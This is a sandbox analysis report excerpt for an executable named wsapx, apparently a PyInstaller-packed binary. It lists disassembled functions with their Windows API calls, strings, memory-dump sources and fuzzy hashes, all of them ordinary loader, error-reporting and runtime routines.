Instruction Fuzzy Hash: 97D1C4B2A0874187EB20EF64E4413ADB7A4FB85BA8F840135EE8D57B95CF38E156C710

Function 00007FF7C71B2C50 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 104windowCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF7C71B3706,?,00007FF7C71B3804), ref: 00007FF7C71B2C9E
FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF7C71B3706,?,00007FF7C71B3804), ref: 00007FF7C71B2D63
MessageBoxW.USER32 ref: 00007FF7C71B2D99

Strings

[PYI-%d:ERROR] , xrefs: 00007FF7C71B2CA6
Error, xrefs: 00007FF7C71B2D8C
%ls: , xrefs: 00007FF7C71B2D22
<FormatMessageW failed.>, xrefs: 00007FF7C71B2D70

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: Message$CurrentFormatProcess
String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
API String ID: 3940978338-251083826
Opcode ID: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
Instruction ID: c7874b6e1f3c0e2f740e3ef0c920de6f20d07722c257f8f0df6a6739500b376a
Opcode Fuzzy Hash: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
Instruction Fuzzy Hash: E731B662B08A4143E621AF15B8542AAA695BFC8BE8F814135DF4E93759DE3CD60BC710

Function 00007FF7C71BDD38 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,00007FF7C71BDFEA,?,?,?,00007FF7C71BDCDC,?,?,?,00007FF7C71BD8D9), ref: 00007FF7C71BDDBD
GetLastError.KERNEL32(?,?,?,00007FF7C71BDFEA,?,?,?,00007FF7C71BDCDC,?,?,?,00007FF7C71BD8D9), ref: 00007FF7C71BDDCB
LoadLibraryExW.KERNEL32(?,?,?,00007FF7C71BDFEA,?,?,?,00007FF7C71BDCDC,?,?,?,00007FF7C71BD8D9), ref: 00007FF7C71BDDF5
FreeLibrary.KERNEL32(?,?,?,00007FF7C71BDFEA,?,?,?,00007FF7C71BDCDC,?,?,?,00007FF7C71BD8D9), ref: 00007FF7C71BDE63
GetProcAddress.KERNEL32(?,?,?,00007FF7C71BDFEA,?,?,?,00007FF7C71BDCDC,?,?,?,00007FF7C71BD8D9), ref: 00007FF7C71BDE6F

Strings

api-ms-, xrefs: 00007FF7C71BDDDD

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
Instruction ID: ba0473aa731bf7e42cd85fbf2bf0c8852bc16cdb4feb7f1355fe2df894286e21
Opcode Fuzzy Hash: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
Instruction Fuzzy Hash: 4631C361B2A60286EE2AAF42B841575A394FF98FB0FC94135DD5D17380EF3CE4468724

Function 00007FF7C71B6350 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 82COMMON

Download Yara Rule

Strings

Path of ucrtbase.dll (%s) and its name exceed buffer size (%d), xrefs: 00007FF7C71B63F7
Failed to load Python DLL '%ls'., xrefs: 00007FF7C71B6497
Path of Python shared library (%s) and its name (%s) exceed buffer size (%d), xrefs: 00007FF7C71B6446
ucrtbase.dll, xrefs: 00007FF7C71B63CD
LoadLibrary, xrefs: 00007FF7C71B649E
Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d), xrefs: 00007FF7C71B63B7

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
API String ID: 2050909247-2434346643
Opcode ID: 5c7507e70d60f0fb7e3c9a3209df06ed2678ab3c183624e845013dd92edd1fac
Instruction ID: d131e0bf37c044a7974ff9731e90d6bf2c0c4d3d92f0c100cc1a6b660e626357
Opcode Fuzzy Hash: 5c7507e70d60f0fb7e3c9a3209df06ed2678ab3c183624e845013dd92edd1fac
Instruction Fuzzy Hash: 08418171A18A8692EA11EF21F4552E9A321FBD4BA0FC04132DE5D43695EF3CE607C760

Function 00007FF7C71B2A50 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 64COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF7C71B351A,?,00000000,00007FF7C71B3F23), ref: 00007FF7C71B2AA0

Strings

Warning, xrefs: 00007FF7C71B2B1E
WARNING, xrefs: 00007FF7C71B2AAF
Warning [ANSI Fallback], xrefs: 00007FF7C71B2B0F
0, xrefs: 00007FF7C71B2B16
[PYI-%d:%s] , xrefs: 00007FF7C71B2AA8

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: CurrentProcess
String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
API String ID: 2050909247-2900015858
Opcode ID: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
Instruction ID: 6b5531451ddfac0b76ca5acae421f9e055fb2d1d851ddc85a51b2d2b1c47eff7
Opcode Fuzzy Hash: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
Instruction Fuzzy Hash: 6D218372A1978183E621AF51B4817E6A394FBC8BE4F800135EE8D43659DF3CD6468750

Function 00007FF7C71CB1C0 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF7C71CB1CF
FlsGetValue.KERNEL32 ref: 00007FF7C71CB1E4
FlsSetValue.KERNEL32 ref: 00007FF7C71CB205
FlsSetValue.KERNEL32 ref: 00007FF7C71CB232
FlsSetValue.KERNEL32 ref: 00007FF7C71CB243
FlsSetValue.KERNEL32 ref: 00007FF7C71CB254
SetLastError.KERNEL32 ref: 00007FF7C71CB26F

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: a5225a2428ee1ea558fded41feed7619df648b57a5ff038aad9245715dd51944
Instruction ID: 96679687bb0f867858aec36cca566132b03a234d53476b55c5c9711b93eb1809
Opcode Fuzzy Hash: a5225a2428ee1ea558fded41feed7619df648b57a5ff038aad9245715dd51944
Instruction Fuzzy Hash: 7C215721F0C28243FA697FA1765613DE1965FC4FB0F808634E93E86AD6DE2CB5438321

Function 00007FF7C71D7DDC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00007FF7C71D7E0D
GetLastError.KERNEL32 ref: 00007FF7C71D7E19
CloseHandle.KERNEL32 ref: 00007FF7C71D7E31
CreateFileW.KERNEL32 ref: 00007FF7C71D7E5C
WriteConsoleW.KERNEL32 ref: 00007FF7C71D7E7B

Strings

CONOUT$, xrefs: 00007FF7C71D7E3D

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 5493e4d9a44aaf731d1a805f3958d18bb0ed212be4b6a830fa2bcaabe5bc997c
Instruction ID: 0226122bda733956a6502481375fa0f909eb21a739ada15b9670158838be3f89
Opcode Fuzzy Hash: 5493e4d9a44aaf731d1a805f3958d18bb0ed212be4b6a830fa2bcaabe5bc997c
Instruction Fuzzy Hash: FC11D631718A4187E361AF12F884329A2A0FBD8FF4F800234D95E87794DF3CE9458B50

Function 00007FF7C71B8560 Relevance: 9.1, APIs: 6, Instructions: 127COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,00000000,00007FF7C71B9216), ref: 00007FF7C71B8592
K32EnumProcessModules.KERNEL32(?,?,00000000,00007FF7C71B9216), ref: 00007FF7C71B85E9

Part of subcall function 00007FF7C71B9400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7C71B45E4,00000000,00007FF7C71B1985), ref: 00007FF7C71B9439

K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF7C71B9216), ref: 00007FF7C71B8678
K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF7C71B9216), ref: 00007FF7C71B86E4
FreeLibrary.KERNEL32(?,?,00000000,00007FF7C71B9216), ref: 00007FF7C71B86F5
FreeLibrary.KERNEL32(?,?,00000000,00007FF7C71B9216), ref: 00007FF7C71B870A

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
String ID:
API String ID: 3462794448-0
Opcode ID: af5051bae1bb50e3ccf69b50d5ac14561a54b739df452b641c0904f08e36c6c8
Instruction ID: 294a10dc7d3b9772d298fc8b9ea58a2a6babd96ee555ac5c571488e1705874c8
Opcode Fuzzy Hash: af5051bae1bb50e3ccf69b50d5ac14561a54b739df452b641c0904f08e36c6c8
Instruction Fuzzy Hash: 384191A2B1868243E730AF12B5406AAA394FBC8FE4F840135DE4D57B89DE3CD543C760

Function 00007FF7C71CB338 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FF7C71C4F81,?,?,?,?,00007FF7C71CA4FA,?,?,?,?,00007FF7C71C71FF), ref: 00007FF7C71CB347
FlsSetValue.KERNEL32(?,?,?,00007FF7C71C4F81,?,?,?,?,00007FF7C71CA4FA,?,?,?,?,00007FF7C71C71FF), ref: 00007FF7C71CB37D
FlsSetValue.KERNEL32(?,?,?,00007FF7C71C4F81,?,?,?,?,00007FF7C71CA4FA,?,?,?,?,00007FF7C71C71FF), ref: 00007FF7C71CB3AA
FlsSetValue.KERNEL32(?,?,?,00007FF7C71C4F81,?,?,?,?,00007FF7C71CA4FA,?,?,?,?,00007FF7C71C71FF), ref: 00007FF7C71CB3BB
FlsSetValue.KERNEL32(?,?,?,00007FF7C71C4F81,?,?,?,?,00007FF7C71CA4FA,?,?,?,?,00007FF7C71C71FF), ref: 00007FF7C71CB3CC
SetLastError.KERNEL32(?,?,?,00007FF7C71C4F81,?,?,?,?,00007FF7C71CA4FA,?,?,?,?,00007FF7C71C71FF), ref: 00007FF7C71CB3E7

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: f3ef772190a77067448dcdc891e93f0fce571c39ad65bd9bbfe034f894ce387b
Instruction ID: 84e7e0a9fadca4a6f36f01f422b65ca118ae486240f7ff63dd1cf62948d89dfb
Opcode Fuzzy Hash: f3ef772190a77067448dcdc891e93f0fce571c39ad65bd9bbfe034f894ce387b
Instruction Fuzzy Hash: 54115C21B0C64283FA657FA1769513DE1865FC4FB0FD45734E82E86BD6DE2CA5438322

Function 00007FF7C71B2910 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 86COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF7C71B1B6A), ref: 00007FF7C71B295E

Strings

[PYI-%d:ERROR] , xrefs: 00007FF7C71B2966
Error, xrefs: 00007FF7C71B2A0E
Error [ANSI Fallback], xrefs: 00007FF7C71B29FF
%s: %s, xrefs: 00007FF7C71B29E8

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: CurrentProcess
String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
API String ID: 2050909247-2962405886
Opcode ID: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
Instruction ID: 0e6d034a4e7fc8c4bebf70231812136ac6f2f6419f14b6921b6d034f5fc074f6
Opcode Fuzzy Hash: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
Instruction Fuzzy Hash: 7B31C462B1868153E720BF61B8416E6A694BFC8BF4F804132EE8D83759EF3CD54B8610

Function 00007FF7C71B2390 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF7C71B23C8
DialogBoxIndirectParamW.USER32 ref: 00007FF7C71B248E
DeleteObject.GDI32 ref: 00007FF7C71B24C1
DestroyIcon.USER32 ref: 00007FF7C71B24D3

Strings

Unhandled exception in script, xrefs: 00007FF7C71B23F8

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
String ID: Unhandled exception in script
API String ID: 3081866767-2699770090
Opcode ID: 9d37adb8919aaa9301242e1672c0db5e18d6b44b4274937772719b263de12092
Instruction ID: fe9599cde958b9244c90cfe3cf0b1c5f1ac0c296915bac6f656c3aca88e967af
Opcode Fuzzy Hash: 9d37adb8919aaa9301242e1672c0db5e18d6b44b4274937772719b263de12092
Instruction Fuzzy Hash: 2F312F726196818AEB20EF61F8552F9A360FFC8BA4F844135EE4E47B59DF3CD1068710

Function 00007FF7C71B2B50 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 65windowCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF7C71B918F,?,00007FF7C71B3C55), ref: 00007FF7C71B2BA0
MessageBoxW.USER32 ref: 00007FF7C71B2C2A

Strings

Warning, xrefs: 00007FF7C71B2C1D
[PYI-%d:%ls] , xrefs: 00007FF7C71B2BA8
WARNING, xrefs: 00007FF7C71B2BAF

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: CurrentMessageProcess
String ID: WARNING$Warning$[PYI-%d:%ls]
API String ID: 1672936522-3797743490
Opcode ID: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
Instruction ID: 817611a5d3294286b8bd5edb3c49afabb3c5bfebe8999a8e7b000bb8bffb938e
Opcode Fuzzy Hash: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
Instruction Fuzzy Hash: E921B172718B4183E721AF54F4847AAA3A4EB88BD4F804131EE8D53659DF3CD206C750

Function 00007FF7C71B2710 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 64COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF7C71B1B99), ref: 00007FF7C71B2760

Strings

Error, xrefs: 00007FF7C71B27DE
Error [ANSI Fallback], xrefs: 00007FF7C71B27CF
ERROR, xrefs: 00007FF7C71B276F
[PYI-%d:%s] , xrefs: 00007FF7C71B2768

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: CurrentProcess
String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
API String ID: 2050909247-1591803126
Opcode ID: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
Instruction ID: 64d08f87e1268a892e2fd38ffa748b565af9ca2ae3d8a0c340e32ee224ec91d1
Opcode Fuzzy Hash: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
Instruction Fuzzy Hash: FF218372A19B8183E621EF51B4817E6A394FBC8BE4F800135EE8D43759DF3CD6468750

Function 00007FF7C71C9AF8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FF7C71C9B1D
GetProcAddress.KERNEL32 ref: 00007FF7C71C9B33
FreeLibrary.KERNEL32 ref: 00007FF7C71C9B5A

Strings

CorExitProcess, xrefs: 00007FF7C71C9B2C
mscoree.dll, xrefs: 00007FF7C71C9B14

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 644f40749f2397ccfee8900b191f86882f652c7814ccefc594fcc00cef1e1075
Instruction ID: 7d48d5ec2930485cf425f8dd2f30bdf2d43a517a67006d89db4082c16d051a11
Opcode Fuzzy Hash: 644f40749f2397ccfee8900b191f86882f652c7814ccefc594fcc00cef1e1075
Instruction Fuzzy Hash: 0DF0AF21A08B0693EA20AF60B498B799320AFC9B71F840235CA6F461E4CF2CD246C720

Function 00007FF7C71D93D8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FF7C71D9400
_set_statfp.LIBCMT ref: 00007FF7C71D941B
_set_statfp.LIBCMT ref: 00007FF7C71D9437
_set_statfp.LIBCMT ref: 00007FF7C71D9473

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
Instruction ID: b99009e7075c00af2b9655543ceb189c9fd05b428b6562c3fe5f9e1b9021c045
Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
Instruction Fuzzy Hash: D811B672D0CA1343F6563914F6DA3759844EFF8B74E850634EA6E062D7CF2C69438960

Function 00007FF7C71CB400 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,00007FF7C71CA613,?,?,00000000,00007FF7C71CA8AE,?,?,?,?,?,00007FF7C71CA83A), ref: 00007FF7C71CB41F
FlsSetValue.KERNEL32(?,?,?,00007FF7C71CA613,?,?,00000000,00007FF7C71CA8AE,?,?,?,?,?,00007FF7C71CA83A), ref: 00007FF7C71CB43E
FlsSetValue.KERNEL32(?,?,?,00007FF7C71CA613,?,?,00000000,00007FF7C71CA8AE,?,?,?,?,?,00007FF7C71CA83A), ref: 00007FF7C71CB466
FlsSetValue.KERNEL32(?,?,?,00007FF7C71CA613,?,?,00000000,00007FF7C71CA8AE,?,?,?,?,?,00007FF7C71CA83A), ref: 00007FF7C71CB477
FlsSetValue.KERNEL32(?,?,?,00007FF7C71CA613,?,?,00000000,00007FF7C71CA8AE,?,?,?,?,?,00007FF7C71CA83A), ref: 00007FF7C71CB488

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
